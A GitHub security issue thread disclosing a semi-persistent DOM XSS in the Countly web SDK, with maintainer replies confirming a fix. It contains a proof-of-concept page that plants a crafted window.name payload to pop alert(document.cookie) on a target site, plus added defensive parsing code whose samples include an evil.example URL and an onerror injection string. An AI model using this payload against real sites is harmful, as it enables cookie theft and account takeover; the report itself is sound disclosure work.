
[Security Issue] Semi-persistent DOM XSS

Open charrismatic opened this issue 3 years ago • 1 comments

Semi-persistent DOM XSS is possible in sites that use this library. The DOM XSS can be triggered by passing a malicious JSON string/configuration via window.name to any window.

It is somewhat different from the usual Reflected XSS that you would see. In a normal Reflected XSS, the XSS would likely not work beyond the initial page (i.e. the victim navigated to another page). In this exploit though, the XSS would likely still work.

Note: urls and domains have been changed for security purposes

Steps

  1. Go to malicious[.]domain[.]com/xss%201`/window.open%123456.html
  2. You will be redirected to target.website.com.
  3. Once the page at target.website.com loads, you should see an alert(document.cookie) popup

123456.html content

```html
<p>1. Click 'Open Window' if you are not redirected automatically</p>
<p>2. Once the new page finishes loading, you will see an alert(document.cookie) XSS</p>
<input type='button' value='open window' onclick='open_window();'>
<script>
	function open_window(){
		// The SDK-recognised prefix followed by a JSON configuration; the "url" field
		// carries the payload. Values are redacted placeholders from the report.
		window.name = "cly:" + '{"app_key":"<redacted>","token":"3","purpose":"heatmap","url":"<redacted>/xss 1"}';
		// Navigate the same window so window.name is carried over to the target site
		window.open("target.website.com",'_self');
	}
	open_window();
</script>
```

This effect persists past page refresh.

I believe the issue originates around here: https://github.com/Countly/countly-sdk-web/blob/master/lib/countly.js#L321 and https://github.com/Countly/countly-sdk-web/blob/master/lib/countly.js#L344

charrismatic avatar Aug 05 '22 17:08 charrismatic
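The report above describes a `cly:`-prefixed JSON configuration being read from `window.name` and trusted, with its `url` field ending up in the page. As an added, defensive illustration (this is not code from the report or from the Countly SDK, and the function names, the field set and the `ALLOWED_PURPOSES` list are assumptions), the parser below treats `window.name` as attacker-controlled input: it rejects malformed JSON, unexpected field types, unknown purposes, identifiers outside a conservative character set, and any `url` that is not an absolute http(s) URL on the consuming page's own origin. It also clears `window.name` once consumed, which removes the "survives a refresh" property the report points out.

```javascript
// Added example: defensive handling of a "cly:" + JSON hand-off via window.name.
// Not the Countly SDK's code; names and fields are assumptions for illustration.

const NAME_PREFIX = "cly:";
const ALLOWED_PURPOSES = new Set(["heatmap"]);           // assumed allow-list
const IDENTIFIER_RE = /^[A-Za-z0-9_-]{1,128}$/;          // app_key / token charset

// Parse an untrusted window.name value. Returns a validated config object or
// null when anything is unexpected. `expectedOrigin` is the origin of the page
// consuming the value (window.location.origin in a browser).
function parseHandoffName(rawName, expectedOrigin) {
  if (typeof rawName !== "string" || !rawName.startsWith(NAME_PREFIX)) return null;

  let parsed;
  try {
    parsed = JSON.parse(rawName.slice(NAME_PREFIX.length));
  } catch (e) {
    return null;                        // malformed JSON: ignore, never fall through
  }
  if (parsed === null || typeof parsed !== "object" || Array.isArray(parsed)) return null;

  const { app_key, token, purpose, url } = parsed;
  // Every field must be a plain string; structured values are rejected outright.
  if ([app_key, token, purpose, url].some((v) => typeof v !== "string")) return null;
  if (!ALLOWED_PURPOSES.has(purpose)) return null;
  // Opaque identifiers: restrict the charset so they can never carry markup.
  if (!IDENTIFIER_RE.test(app_key) || !IDENTIFIER_RE.test(token)) return null;

  // url must parse as an absolute URL on the consuming page's own origin.
  let target;
  try {
    target = new URL(url);              // throws on relative or garbage input
  } catch (e) {
    return null;
  }
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;
  if (target.origin !== expectedOrigin) return null;

  // Return only the normalised URL string, never the raw input.
  return { app_key, token, purpose, url: target.href };
}

// Consume the hand-off once and clear window.name so the value does not
// persist across reloads or into later navigations of this window.
function consumeHandoffName(win, expectedOrigin) {
  const cfg = parseHandoffName(win.name, expectedOrigin);
  win.name = "";
  return cfg;
}

// Constructed sample inputs (placeholders, not the report's redacted values).
const SAMPLE_CROSS_ORIGIN =
  'cly:{"app_key":"abc","token":"3","purpose":"heatmap","url":"https://evil.example/xss 1"}';
const SAMPLE_SAME_ORIGIN =
  'cly:{"app_key":"abc","token":"3","purpose":"heatmap","url":"https://target.website.com/page"}';
```

Two caveats follow from this design. A same-origin check alone is not an XSS fix: a path such as `/"><img src=x onerror=...>` still parses as a valid same-origin URL, so whatever the SDK does with the returned `url` must set it through DOM properties (`element.textContent`, `element.setAttribute`, `element.src`) rather than concatenating it into HTML. Second, clearing `window.name` after consumption is what breaks the semi-persistence; without it the payload is re-read on every load.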

Hi Matt, thank you for bringing this to our attention, we will look into this issue as soon as possible.

turtledreams avatar Aug 05 '22 19:08 turtledreams

Hi Matt a fix has been released for this (https://github.com/Countly/countly-sdk-web/releases/tag/22.06.2). Thank you for bringing this up again. Also for the related documentation: https://support.count.ly/hc/en-us/articles/360037441932-Web-analytics-JavaScript-#heatmaps

turtledreams avatar Feb 17 '23 12:02 turtledreams